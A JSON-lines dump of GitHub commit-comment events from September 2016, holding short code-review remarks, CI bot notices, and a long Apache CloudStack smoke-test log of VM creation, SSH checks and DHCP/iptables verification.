{"id":"4638255301","type":"CommitCommentEvent","actor":{"login":"gabebw"},"repo":{"name":"adarsh/blog"},"payload":{"comment":{"id":19226534,"position":null,"line":null,"path":null,"commit_id":"09fca61c707599fa0cd86668465698d8484ebf4b","created_at":"2016-09-29T16:06:22Z","updated_at":"2016-09-29T16:06:22Z","body":"`zmv` 😍 "}},"created_at":"2016-09-29T16:06:22Z"}
{"id":"4638263940","type":"CommitCommentEvent","actor":{"login":"dhalperi"},"repo":{"name":"jkff/incubator-beam"},"payload":{"comment":{"id":19226547,"position":4,"line":262,"path":"sdks/java/io/google-cloud-platform/pom.xml","commit_id":"96993124741516e6562e347d3f5fec8cadb04798","created_at":"2016-09-29T16:07:43Z","updated_at":"2016-09-29T16:07:43Z","body":"indent off?"}},"created_at":"2016-09-29T16:07:43Z"}
{"id":"4638267937","type":"CommitCommentEvent","actor":{"login":"Terminus-IMRC"},"repo":{"name":"raspberrypi/firmware"},"payload":{"comment":{"id":19226556,"position":null,"line":null,"path":null,"commit_id":"ad8608c08b122b2c228dba0ff5070d6e9519faf5","created_at":"2016-09-29T16:08:21Z","updated_at":"2016-09-29T16:08:21Z","body":"Thanks!"}},"created_at":"2016-09-29T16:08:21Z"}
{"id":"4638269988","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226563,"position":null,"line":null,"path":null,"commit_id":"3afffb070cf95e7829fc19a7a37fe610820192d3","created_at":"2016-09-29T16:08:41Z","updated_at":"2016-09-29T16:08:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1214](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14621&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T16:08:41Z"}
{"id":"4638270267","type":"CommitCommentEvent","actor":{"login":"RodrigoScheuer"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19226567,"position":27,"line":27,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"0d872a5b23f3d64e8ad172810ec0143a457afb29","created_at":"2016-09-29T16:08:43Z","updated_at":"2016-09-29T16:08:43Z","body":"ok"}},"created_at":"2016-09-29T16:08:43Z"}
{"id":"4638271471","type":"CommitCommentEvent","actor":{"login":"dhalperi"},"repo":{"name":"jkff/incubator-beam"},"payload":{"comment":{"id":19226572,"position":130,"line":409,"path":"sdks/java/io/google-cloud-platform/src/main/java/org/apache/beam/sdk/io/gcp/datastore/DatastoreV1.java","commit_id":"96993124741516e6562e347d3f5fec8cadb04798","created_at":"2016-09-29T16:08:55Z","updated_at":"2016-09-29T16:08:55Z","body":"while you're in there, drop this comment? Totally unnecessary as it's the default behavior."}},"created_at":"2016-09-29T16:08:55Z"}
{"id":"4638274397","type":"CommitCommentEvent","actor":{"login":"dhalperi"},"repo":{"name":"jkff/incubator-beam"},"payload":{"comment":{"id":19226581,"position":174,"line":493,"path":"sdks/java/io/google-cloud-platform/src/main/java/org/apache/beam/sdk/io/gcp/datastore/DatastoreV1.java","commit_id":"96993124741516e6562e347d3f5fec8cadb04798","created_at":"2016-09-29T16:09:21Z","updated_at":"2016-09-29T16:09:21Z","body":"is there an existing toString test? It passes? awesome."}},"created_at":"2016-09-29T16:09:21Z"}
{"id":"4638277708","type":"CommitCommentEvent","actor":{"login":"chvalean"},"repo":{"name":"LIS/lis-test"},"payload":{"comment":{"id":19226592,"position":null,"line":null,"path":null,"commit_id":"f6ceb30539c155368c055e84a3367c5bd6acb492","created_at":"2016-09-29T16:09:53Z","updated_at":"2016-09-29T16:09:53Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [update production checkpoint automation](https://trello.com/c/kVMYInkT/380-update-production-checkpoint-automation)"}},"created_at":"2016-09-29T16:09:53Z"}
{"id":"4638277980","type":"CommitCommentEvent","actor":{"login":"denyszamiatin"},"repo":{"name":"denyszamiatin/Agregator"},"payload":{"comment":{"id":19226595,"position":409,"line":135,"path":"agregator.py","commit_id":"1e10d406b035980a40d93d86a198c3f368081aa7","created_at":"2016-09-29T16:09:55Z","updated_at":"2016-09-29T16:09:55Z","body":"Вынести из цикла"}},"created_at":"2016-09-29T16:09:55Z"}
{"id":"4638278950","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":19226597,"position":null,"line":null,"path":null,"commit_id":"9152ee33f24163f6930be9ca4fa8175cb5631153","created_at":"2016-09-29T16:10:04Z","updated_at":"2016-09-29T16:10:04Z","body":"SGTM!"}},"created_at":"2016-09-29T16:10:04Z"}
{"id":"4638280375","type":"CommitCommentEvent","actor":{"login":"jrmartin"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19226599,"position":7,"line":217,"path":"src/main/webapp/js/tests/casperjs/geppetto-tests.js","commit_id":"a8bae8571e3d5351dd9801b75c43d503c32c94b0","created_at":"2016-09-29T16:10:16Z","updated_at":"2016-09-29T16:10:16Z","body":"@gidili Is not being used everywhere, all those other assertions and checks are made with casper.\r\nAccording to casper docs, we have to inject it inside the test stub where we plan to use it. http://docs.casperjs.org/en/latest/faq.html#can-i-use-jquery-with-casperjs\r\nAlthough there seems to be a way to make it available on the whole page according to that link, I originally overlooked it since I only needed jquery once. \r\n"}},"created_at":"2016-09-29T16:10:16Z"}
{"id":"4638282530","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19226606,"position":null,"line":null,"path":null,"commit_id":"efc13a2ad7f190c14665f55d4a696215f86f72bb","created_at":"2016-09-29T16:10:36Z","updated_at":"2016-09-29T16:10:36Z","body":"don't worry, he will convert them to chartjs. Probably tomorrow.  "}},"created_at":"2016-09-29T16:10:36Z"}
{"id":"4638282648","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19226607,"position":null,"line":null,"path":null,"commit_id":"efc13a2ad7f190c14665f55d4a696215f86f72bb","created_at":"2016-09-29T16:10:37Z","updated_at":"2016-09-29T16:10:37Z","body":"Yes. I don't feel too eager to update it, since all statistics need to be rewritten anyway."}},"created_at":"2016-09-29T16:10:37Z"}
{"id":"4638282873","type":"CommitCommentEvent","actor":{"login":"Ethal"},"repo":{"name":"jeedom/core"},"payload":{"comment":{"id":19226609,"position":4,"line":8,"path":"install/update/2.5.2.php","commit_id":"cacc6806309c591fbc486a0e7b4c40788a38a2d9","created_at":"2016-09-29T16:10:39Z","updated_at":"2016-09-29T16:10:39Z","body":"'id_ID' instead of 'id_IS'"}},"created_at":"2016-09-29T16:10:39Z"}
{"id":"4638283142","type":"CommitCommentEvent","actor":{"login":"klickverbot"},"repo":{"name":"weka-io/ldc"},"payload":{"comment":{"id":19226610,"position":24,"line":111,"path":"driver/linker.cpp","commit_id":"c1fadc936a12ce544064f94912daeee4c36079b7","created_at":"2016-09-29T16:10:42Z","updated_at":"2016-09-29T16:10:42Z","body":"> On Linux, not so much. Module constructors are not called somehow.\r\n\r\nOne of the priorities when implementing the module registry scheme is that it would also work with LLVM-level linking in the picture. In fact, I think we were still using `llvm::Linker` for `-singleobj` builds back then. The first step would be to inspect the IR and object file to make sure the `.minfo` symbols are still put out correctly in between the bracketing symbols."}},"created_at":"2016-09-29T16:10:42Z"}
{"id":"4638283174","type":"CommitCommentEvent","actor":{"login":"denyszamiatin"},"repo":{"name":"denyszamiatin/Agregator"},"payload":{"comment":{"id":19226611,"position":415,"line":141,"path":"agregator.py","commit_id":"1e10d406b035980a40d93d86a198c3f368081aa7","created_at":"2016-09-29T16:10:42Z","updated_at":"2016-09-29T16:10:42Z","body":"137-141 нужно удалить"}},"created_at":"2016-09-29T16:10:42Z"}
{"id":"4638284772","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19226612,"position":null,"line":null,"path":null,"commit_id":"efc13a2ad7f190c14665f55d4a696215f86f72bb","created_at":"2016-09-29T16:10:58Z","updated_at":"2016-09-29T16:10:58Z","body":":O"}},"created_at":"2016-09-29T16:10:58Z"}
{"id":"4638284895","type":"CommitCommentEvent","actor":{"login":"danbst"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19226613,"position":5,"line":7,"path":"nixos/doc/manual/release-notes/rl-1609.xml","commit_id":"a9166d143d8a9b9db9e2e903abbb4ce3a27a26ae","created_at":"2016-09-29T16:10:59Z","updated_at":"2016-09-29T16:10:59Z","body":"is non-existing release date intentional? =)"}},"created_at":"2016-09-29T16:10:59Z"}
{"id":"4638285090","type":"CommitCommentEvent","actor":{"login":"borisstoyanov"},"repo":{"name":"shapeblue/cloudstack"},"payload":{"comment":{"id":19226616,"position":null,"line":null,"path":null,"commit_id":"62f48263688a5765b5bd55ebfaecddfbb698acd3","created_at":"2016-09-29T16:11:00Z","updated_at":"2016-09-29T16:11:00Z","body":"Here are the test results of the execution: \r\n```\r\n# nosetests --with-xunit --xunit-file=dhcp_hosts.xml --with-marvin --marvin-config=/marvin/trl-72-v-cs48-bstoyanov-advanced-cfg --hypervisor=vmware -a tags=advanced tests/smoke/test_routers_iptables_default_policy.py\r\n\r\n==== Marvin Init Started ====\r\n\r\n=== Marvin Parse Config Successful ===\r\n\r\n=== Marvin Setting TestData Successful===\r\n\r\n==== Log Folder Path: /marvin//MarvinLogs//Sep_29_2016_16_49_22_BGB3G5. All logs will be available here ====\r\n\r\n=== Marvin Init Logging Successful===\r\n\r\n==== Marvin Init Successful ====\r\nStarting test_02_routervm_iptables_policies\r\nCreating VM\r\nCreated VM=f517c4a9-b8c2-4b62-b204-0409e681c424\r\nCreating a VPC offering.\r\nEnabling the VPC offering created\r\nCreating a VPC network in the account: test-TestVPCIpTablesPolicies-test_02_routervm_iptables_policies-A2X9O2\r\nStarting test_01_single_VPC_iptables_policies\r\nCreate NetworkOffering\r\nCreated and Enabled NetworkOffering\r\nAdding Network={'netmask': '255.255.255.0', 'displaytext': 'Test Network', 'name': 'NETWORK-10.1.1.1'} to VPC ID c4b96339-5afd-494d-8ddf-143e9465e770\r\nCreated network with ID: ab80158f-73c3-48fc-8633-7a690d2e14b9\r\nCreating VM in network=NETWORK-10.1.1.1\r\nCreated VM=e8b574c3-a77b-49e5-b240-695652f0668b in network=NETWORK-10.1.1.1\r\nCreate NetworkOffering\r\nCreated and Enabled NetworkOffering\r\nAdding Network={'netmask': '255.255.255.0', 'displaytext': 'Test Network', 'name': 'NETWORK-10.1.2.1'} to VPC ID c4b96339-5afd-494d-8ddf-143e9465e770\r\nCreated network with ID: 4ceba884-15c4-4e02-83ae-31194baee55f\r\nCreating VM in network=NETWORK-10.1.2.1\r\nCreated VM=42075581-e5ba-4cbd-903c-8d87159d38dd in network=NETWORK-10.1.2.1\r\nAssociating public IP for network: NETWORK-10.1.1.1\r\nAssociated 10.1.34.183 with network ab80158f-73c3-48fc-8633-7a690d2e14b9\r\nCreating NAT rule in network for vm with public IP\r\nAdding NetworkACL rules to make NAT rule accessible\r\nnwacl_nat={'startport': u'22', 'endport': u'22', 'aclid': u'23ff4d40-c001-4998-a208-daf59f432677', 'fordisplay': True, 'cidrlist': u'0.0.0.0/0', 'tags': [], 'number': 1, 'traffictype': u'Ingress', 'state': u'Active', 'action': u'Allow', 'protocol': u'tcp', 'id': u'828ecad0-d348-403a-a8e2-9c97018908ba'}\r\nAssociating public IP for network: NETWORK-10.1.2.1\r\nAssociated 10.1.34.199 with network 4ceba884-15c4-4e02-83ae-31194baee55f\r\nCreating NAT rule in network for vm with public IP\r\nAdding NetworkACL rules to make NAT rule accessible\r\nnwacl_nat={'startport': u'22', 'endport': u'22', 'aclid': u'21048e11-56ae-4b28-91d9-f3356ea4dcff', 'fordisplay': True, 'cidrlist': u'0.0.0.0/0', 'tags': [], 'number': 1, 'traffictype': u'Ingress', 'state': u'Active', 'action': u'Allow', 'protocol': u'tcp', 'id': u'cfe0d411-6d4f-41d2-ad39-e853e12bda28'}\r\nChecking if we can SSH into VM=VM-e8b574c3-a77b-49e5-b240-695652f0668b on public_ip=10.1.34.183\r\n====Trying SSH Connection: Host:10.1.34.183 User:root                                   Port:22 RetryCnt:20===\r\n===SSH to Host 10.1.34.183 port : 22 SUCCESSFUL===\r\nSSH into VM=VM-e8b574c3-a77b-49e5-b240-695652f0668b on public_ip=10.1.34.183 is successful\r\nChecking if we can SSH into VM=VM-42075581-e5ba-4cbd-903c-8d87159d38dd on public_ip=10.1.34.199\r\n====Trying SSH Connection: Host:10.1.34.199 User:root                                   Port:22 RetryCnt:20===\r\n====Trying SSH Connection: Host:10.1.34.199 User:root                                   Port:22 RetryCnt:20===\r\nSshClient: Exception under createConnection: ['Traceback (most recent call last):\\n', '  File \"/usr/lib/python2.7/site-packages/marvin/sshClient.py\", line 122, in createConnection\\n    allow_agent=False)\\n', '  File \"/usr/lib/python2.7/site-packages/paramiko/client.py\", line 324, in connect\\n    raise NoValidConnectionsError(errors)\\n', 'NoValidConnectionsError: [Errno None] Unable to connect to port 22 on 10.1.34.199\\n']\r\nTraceback (most recent call last):\r\n  File \"/usr/lib/python2.7/site-packages/marvin/sshClient.py\", line 122, in createConnection\r\n    allow_agent=False)\r\n  File \"/usr/lib/python2.7/site-packages/paramiko/client.py\", line 324, in connect\r\n    raise NoValidConnectionsError(errors)\r\nNoValidConnectionsError: [Errno None] Unable to connect to port 22 on 10.1.34.199\r\nSshClient: Exception under createConnection: ['Traceback (most recent call last):\\n', '  File \"/usr/lib/python2.7/site-packages/marvin/sshClient.py\", line 122, in createConnection\\n    allow_agent=False)\\n', '  File \"/usr/lib/python2.7/site-packages/paramiko/client.py\", line 324, in connect\\n    raise NoValidConnectionsError(errors)\\n', 'NoValidConnectionsError: [Errno None] Unable to connect to port 22 on 10.1.34.199\\n']\r\nTraceback (most recent call last):\r\n  File \"/usr/lib/python2.7/site-packages/marvin/sshClient.py\", line 122, in createConnection\r\n    allow_agent=False)\r\n  File \"/usr/lib/python2.7/site-packages/paramiko/client.py\", line 324, in connect\r\n    raise NoValidConnectionsError(errors)\r\nNoValidConnectionsError: [Errno None] Unable to connect to port 22 on 10.1.34.199\r\n====Trying SSH Connection: Host:10.1.34.199 User:root                                   Port:22 RetryCnt:19===\r\n====Trying SSH Connection: Host:10.1.34.199 User:root                                   Port:22 RetryCnt:19===\r\n===SSH to Host 10.1.34.199 port : 22 SUCCESSFUL===\r\n===SSH to Host 10.1.34.199 port : 22 SUCCESSFUL===\r\nSSH into VM=VM-42075581-e5ba-4cbd-903c-8d87159d38dd on public_ip=10.1.34.199 is successful\r\n====Trying SSH Connection: Host:10.2.2.39 User:root                                   Port:22 RetryCnt:60===\r\n====Trying SSH Connection: Host:10.2.2.39 User:root                                   Port:22 RetryCnt:60===\r\n====Trying SSH Connection: Host:10.2.2.39 User:root                                   Port:22 RetryCnt:60===\r\n===SSH to Host 10.2.2.39 port : 22 SUCCESSFUL===\r\n===SSH to Host 10.2.2.39 port : 22 SUCCESSFUL===\r\n===SSH to Host 10.2.2.39 port : 22 SUCCESSFUL===\r\n{Cmd: ssh -i ~/.ssh/id_rsa.cloud -ostricthostkeychecking=no -oUserKnownHostsFile=/dev/null -p 3922 10.2.5.193 iptables -L INPUT via Host: 10.2.2.39} {returns: [u'Warning: Identity file //.ssh/id_rsa.cloud not accessible: No such file or directory.', u'ssh: connect to host 10.2.5.193 port 3922: Connection timed out']}\r\n{Cmd: ssh -i ~/.ssh/id_rsa.cloud -ostricthostkeychecking=no -oUserKnownHostsFile=/dev/null -p 3922 10.2.5.193 iptables -L INPUT via Host: 10.2.2.39} {returns: [u'Warning: Identity file //.ssh/id_rsa.cloud not accessible: No such file or directory.', u'ssh: connect to host 10.2.5.193 port 3922: Connection timed out']}\r\n{Cmd: ssh -i ~/.ssh/id_rsa.cloud -ostricthostkeychecking=no -oUserKnownHostsFile=/dev/null -p 3922 10.2.5.193 iptables -L INPUT via Host: 10.2.2.39} {returns: [u'Warning: Identity file //.ssh/id_rsa.cloud not accessible: No such file or directory.', u'ssh: connect to host 10.2.5.193 port 3922: Connection timed out']}\r\niptables -L INPUT: [u'Warning: Identity file //.ssh/id_rsa.cloud not accessible: No such file or directory.', u'ssh: connect to host 10.2.5.193 port 3922: Connection timed out']\r\nDestroying routers\r\nStopping router\r\n===final results are now copied to: /marvin//MarvinLogs/test_routers_iptables_default_policy_ZUJP4G===\r\n```\r\n\r\n&\r\n\r\n```\r\n# nosetests --with-xunit --xunit-file=dhcp_hosts.xml --with-marvin --marvin-config=/marvin/trl-72-v-cs48-bstoyanov-advanced-cfg --hypervisor=vmware -a tags=advanced tests/smoke/test_router_dhcphosts.py\r\n\r\n==== Marvin Init Started ====\r\n\r\n=== Marvin Parse Config Successful ===\r\n\r\n=== Marvin Setting TestData Successful===\r\n\r\n==== Log Folder Path: /marvin//MarvinLogs//Sep_29_2016_17_03_26_HDZXZJ. All logs will be available here ====\r\n\r\n=== Marvin Init Logging Successful===\r\n\r\n==== Marvin Init Successful ====\r\nCreating Admin Account for domain 41c6fda1-84cf-11e6-bbd2-066638010710 on zone b8d4cea4-6b4b-4cfb-9f17-0a6b31fec09f\r\nCreating Service Offering on zone b8d4cea4-6b4b-4cfb-9f17-0a6b31fec09f\r\nCreating Network Offering on zone b8d4cea4-6b4b-4cfb-9f17-0a6b31fec09f\r\nCreating Network for Account test-a-TestRouterDHCPHosts-UI4YEN using offering b614a507-1bf6-42e5-b609-4888085a032e\r\nCreating VM1 for Account test-a-TestRouterDHCPHosts-UI4YEN using offering ed7b245c-138c-49a9-ba3d-c167689a0a1c with IP 10.1.1.50\r\nCreating VM2 for Account test-a-TestRouterDHCPHosts-UI4YEN using offering ed7b245c-138c-49a9-ba3d-c167689a0a1c with IP 10.1.1.51\r\nStarting test_router_dhcphosts...\r\nCreating Firewall rule for VM ID: da894f11-be1e-46ea-ae7a-37c2982b5aad\r\nCreating NAT rule for VM ID: da894f11-be1e-46ea-ae7a-37c2982b5aad\r\nCreating Firewall rule for VM ID: 52a19eea-1b41-4573-97a0-982d3c8bf927\r\nCreating NAT rule for VM ID: 52a19eea-1b41-4573-97a0-982d3c8bf927\r\nTesting SSH to VMs da894f11-be1e-46ea-ae7a-37c2982b5aad and 52a19eea-1b41-4573-97a0-982d3c8bf927\r\nSSH into VM with IP: 10.1.34.197\r\n====Trying SSH Connection: Host:10.1.34.197 User:root                                   Port:222 RetryCnt:5===\r\nSshClient: Exception under createConnection: ['Traceback (most recent call last):\\n', '  File \"/usr/lib/python2.7/site-packages/marvin/sshClient.py\", line 122, in createConnection\\n    allow_agent=False)\\n', '  File \"/usr/lib/python2.7/site-packages/paramiko/client.py\", line 324, in connect\\n    raise NoValidConnectionsError(errors)\\n', 'NoValidConnectionsError: [Errno None] Unable to connect to port 222 on 10.1.34.197\\n']\r\nTraceback (most recent call last):\r\n  File \"/usr/lib/python2.7/site-packages/marvin/sshClient.py\", line 122, in createConnection\r\n    allow_agent=False)\r\n  File \"/usr/lib/python2.7/site-packages/paramiko/client.py\", line 324, in connect\r\n    raise NoValidConnectionsError(errors)\r\nNoValidConnectionsError: [Errno None] Unable to connect to port 222 on 10.1.34.197\r\n====Trying SSH Connection: Host:10.1.34.197 User:root                                   Port:222 RetryCnt:4===\r\n===SSH to Host 10.1.34.197 port : 222 SUCCESSFUL===\r\n{Cmd: ping -c 3 8.8.8.8 via Host: 10.1.34.197} {returns: [u'PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.', u'64 bytes from 8.8.8.8: icmp_seq=1 ttl=52 time=16.8 ms', u'64 bytes from 8.8.8.8: icmp_seq=2 ttl=52 time=16.4 ms', u'64 bytes from 8.8.8.8: icmp_seq=3 ttl=52 time=17.2 ms', u'', u'--- 8.8.8.8 ping statistics ---', u'3 packets transmitted, 3 received, 0% packet loss, time 2000ms', u'rtt min/avg/max/mdev = 16.424/16.844/17.220/0.359 ms']}\r\nSSH result: [u'PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.', u'64 bytes from 8.8.8.8: icmp_seq=1 ttl=52 time=16.8 ms', u'64 bytes from 8.8.8.8: icmp_seq=2 ttl=52 time=16.4 ms', u'64 bytes from 8.8.8.8: icmp_seq=3 ttl=52 time=17.2 ms', u'', u'--- 8.8.8.8 ping statistics ---', u'3 packets transmitted, 3 received, 0% packet loss, time 2000ms', u'rtt min/avg/max/mdev = 16.424/16.844/17.220/0.359 ms']; COUNT is ==> 1\r\nSSH into VM with IP: 10.1.34.197\r\n====Trying SSH Connection: Host:10.1.34.197 User:root                                   Port:223 RetryCnt:5===\r\n====Trying SSH Connection: Host:10.1.34.197 User:root                                   Port:223 RetryCnt:5===\r\nSshClient: Exception under createConnection: ['Traceback (most recent call last):\\n', '  File \"/usr/lib/python2.7/site-packages/marvin/sshClient.py\", line 122, in createConnection\\n    allow_agent=False)\\n', '  File \"/usr/lib/python2.7/site-packages/paramiko/client.py\", line 324, in connect\\n    raise NoValidConnectionsError(errors)\\n', 'NoValidConnectionsError: [Errno None] Unable to connect to port 223 on 10.1.34.197\\n']\r\nTraceback (most recent call last):\r\n  File \"/usr/lib/python2.7/site-packages/marvin/sshClient.py\", line 122, in createConnection\r\n    allow_agent=False)\r\n  File \"/usr/lib/python2.7/site-packages/paramiko/client.py\", line 324, in connect\r\n    raise NoValidConnectionsError(errors)\r\nNoValidConnectionsError: [Errno None] Unable to connect to port 223 on 10.1.34.197\r\nSshClient: Exception under createConnection: ['Traceback (most recent call last):\\n', '  File \"/usr/lib/python2.7/site-packages/marvin/sshClient.py\", line 122, in createConnection\\n    allow_agent=False)\\n', '  File \"/usr/lib/python2.7/site-packages/paramiko/client.py\", line 324, in connect\\n    raise NoValidConnectionsError(errors)\\n', 'NoValidConnectionsError: [Errno None] Unable to connect to port 223 on 10.1.34.197\\n']\r\nTraceback (most recent call last):\r\n  File \"/usr/lib/python2.7/site-packages/marvin/sshClient.py\", line 122, in createConnection\r\n    allow_agent=False)\r\n  File \"/usr/lib/python2.7/site-packages/paramiko/client.py\", line 324, in connect\r\n    raise NoValidConnectionsError(errors)\r\nNoValidConnectionsError: [Errno None] Unable to connect to port 223 on 10.1.34.197\r\n====Trying SSH Connection: Host:10.1.34.197 User:root                                   Port:223 RetryCnt:4===\r\n====Trying SSH Connection: Host:10.1.34.197 User:root                                   Port:223 RetryCnt:4===\r\n===SSH to Host 10.1.34.197 port : 223 SUCCESSFUL===\r\n===SSH to Host 10.1.34.197 port : 223 SUCCESSFUL===\r\n{Cmd: ping -c 3 8.8.8.8 via Host: 10.1.34.197} {returns: [u'PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.', u'64 bytes from 8.8.8.8: icmp_seq=1 ttl=52 time=18.0 ms', u'64 bytes from 8.8.8.8: icmp_seq=2 ttl=52 time=16.2 ms', u'64 bytes from 8.8.8.8: icmp_seq=3 ttl=52 time=16.8 ms', u'', u'--- 8.8.8.8 ping statistics ---', u'3 packets transmitted, 3 received, 0% packet loss, time 2001ms', u'rtt min/avg/max/mdev = 16.287/17.055/18.028/0.733 ms']}\r\n{Cmd: ping -c 3 8.8.8.8 via Host: 10.1.34.197} {returns: [u'PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.', u'64 bytes from 8.8.8.8: icmp_seq=1 ttl=52 time=18.0 ms', u'64 bytes from 8.8.8.8: icmp_seq=2 ttl=52 time=16.2 ms', u'64 bytes from 8.8.8.8: icmp_seq=3 ttl=52 time=16.8 ms', u'', u'--- 8.8.8.8 ping statistics ---', u'3 packets transmitted, 3 received, 0% packet loss, time 2001ms', u'rtt min/avg/max/mdev = 16.287/17.055/18.028/0.733 ms']}\r\nSSH result: [u'PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.', u'64 bytes from 8.8.8.8: icmp_seq=1 ttl=52 time=18.0 ms', u'64 bytes from 8.8.8.8: icmp_seq=2 ttl=52 time=16.2 ms', u'64 bytes from 8.8.8.8: icmp_seq=3 ttl=52 time=16.8 ms', u'', u'--- 8.8.8.8 ping statistics ---', u'3 packets transmitted, 3 received, 0% packet loss, time 2001ms', u'rtt min/avg/max/mdev = 16.287/17.055/18.028/0.733 ms']; COUNT is ==> 1\r\nTesting DHCP hosts for VMs da894f11-be1e-46ea-ae7a-37c2982b5aad and 52a19eea-1b41-4573-97a0-982d3c8bf927\r\n====Trying SSH Connection: Host:10.2.2.39 User:root                                   Port:22 RetryCnt:60===\r\n====Trying SSH Connection: Host:10.2.2.39 User:root                                   Port:22 RetryCnt:60===\r\n====Trying SSH Connection: Host:10.2.2.39 User:root                                   Port:22 RetryCnt:60===\r\n===SSH to Host 10.2.2.39 port : 22 SUCCESSFUL===\r\n===SSH to Host 10.2.2.39 port : 22 SUCCESSFUL===\r\n===SSH to Host 10.2.2.39 port : 22 SUCCESSFUL===\r\n{Cmd: ssh -i ~/.ssh/id_rsa.cloud -ostricthostkeychecking=no -oUserKnownHostsFile=/dev/null -p 3922 10.2.5.182 cat /etc/dhcphosts.txt | grep 10.1.1.50 | sed 's/\\,/ /g' | awk '{print $2}' via Host: 10.2.2.39} {returns: [u'Warning: Identity file //.ssh/id_rsa.cloud not accessible: No such file or directory.', u'ssh: connect to host 10.2.5.182 port 3922: Connection timed out']}\r\n{Cmd: ssh -i ~/.ssh/id_rsa.cloud -ostricthostkeychecking=no -oUserKnownHostsFile=/dev/null -p 3922 10.2.5.182 cat /etc/dhcphosts.txt | grep 10.1.1.50 | sed 's/\\,/ /g' | awk '{print $2}' via Host: 10.2.2.39} {returns: [u'Warning: Identity file //.ssh/id_rsa.cloud not accessible: No such file or directory.', u'ssh: connect to host 10.2.5.182 port 3922: Connection timed out']}\r\n{Cmd: ssh -i ~/.ssh/id_rsa.cloud -ostricthostkeychecking=no -oUserKnownHostsFile=/dev/null -p 3922 10.2.5.182 cat /etc/dhcphosts.txt | grep 10.1.1.50 | sed 's/\\,/ /g' | awk '{print $2}' via Host: 10.2.2.39} {returns: [u'Warning: Identity file //.ssh/id_rsa.cloud not accessible: No such file or directory.', u'ssh: connect to host 10.2.5.182 port 3922: Connection timed out']}\r\ncat /etc/dhcphosts.txt | grep 10.1.1.50 | sed 's/\\,/ /g' | awk '{print $2}' RESULT IS ==> [u'Warning: Identity file //.ssh/id_rsa.cloud not accessible: No such file or directory.', u'ssh: connect to host 10.2.5.182 port 3922: Connection timed out']\r\n```"}},"created_at":"2016-09-29T16:11:00Z"}
{"id":"4638301674","type":"CommitCommentEvent","actor":{"login":"jonathanwss"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19226648,"position":18,"line":18,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"12d36e7742ef5d8fd656ba3be06aa34533815485","created_at":"2016-09-29T16:13:39Z","updated_at":"2016-09-29T16:13:39Z","body":"Ok"}},"created_at":"2016-09-29T16:13:39Z"}
{"id":"4638303151","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"KnowSheet/CTFO_BE"},"payload":{"comment":{"id":19226652,"position":null,"line":null,"path":null,"commit_id":"4dad2b1fd8f3197b864fd6cd9e3c556712115506","created_at":"2016-09-29T16:13:53Z","updated_at":"2016-09-29T16:13:53Z","body":":+1: "}},"created_at":"2016-09-29T16:13:53Z"}
{"id":"4638303411","type":"CommitCommentEvent","actor":{"login":"jonathanwss"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19226653,"position":25,"line":25,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"12d36e7742ef5d8fd656ba3be06aa34533815485","created_at":"2016-09-29T16:13:55Z","updated_at":"2016-09-29T16:13:55Z","body":"Sim, está feito."}},"created_at":"2016-09-29T16:13:55Z"}
{"id":"4638303749","type":"CommitCommentEvent","actor":{"login":"ramses0"},"repo":{"name":"ramses0/qb"},"payload":{"comment":{"id":19226655,"position":null,"line":null,"path":null,"commit_id":"7ea16bca01dc374669714d5afeb3e892e656555d","created_at":"2016-09-29T16:13:59Z","updated_at":"2016-09-29T16:13:59Z","body":"extensionVersion.js: +5\n- Limit: 1000, Prod: 501 Local: 506\nutility.js: +0\n- Limit: 5000, Prod: 2.1K Local: 2.1K\nriqGmail.js: -26\n- Limit: 1000, Prod: 698 Local: 672\ngmail-app.????-*-*-*-*.js: error?\n - Limit: 1500000, Prod: 4.4M Local: 0\ngmail-app.????-*-*-*-*.css: -265.3K\n- Limit: 1500000, Prod: 1.4M Local: 1.1M"}},"created_at":"2016-09-29T16:13:59Z"}
{"id":"4638304298","type":"CommitCommentEvent","actor":{"login":"jsta"},"repo":{"name":"jsta/webp"},"payload":{"comment":{"id":19226659,"position":null,"line":null,"path":null,"commit_id":"bb371cee3bb2d90a58680edf2bc0b638b9530864","created_at":"2016-09-29T16:14:04Z","updated_at":"2016-09-29T16:14:04Z","body":"Just leaving a note here that this typo fix has not been pushed to CRAN."}},"created_at":"2016-09-29T16:14:04Z"}
{"id":"4638305449","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19226663,"position":null,"line":null,"path":null,"commit_id":"efc13a2ad7f190c14665f55d4a696215f86f72bb","created_at":"2016-09-29T16:14:15Z","updated_at":"2016-09-29T16:14:15Z","body":"well this what have been decide this morning with Carsten right?\r\nWe'll not rewrite the statistic engine, because the question objects will handle the stat rendering themselves. \r\nSo if you don't chartjs frontend stats now, it will remain like that for a long time. "}},"created_at":"2016-09-29T16:14:15Z"}
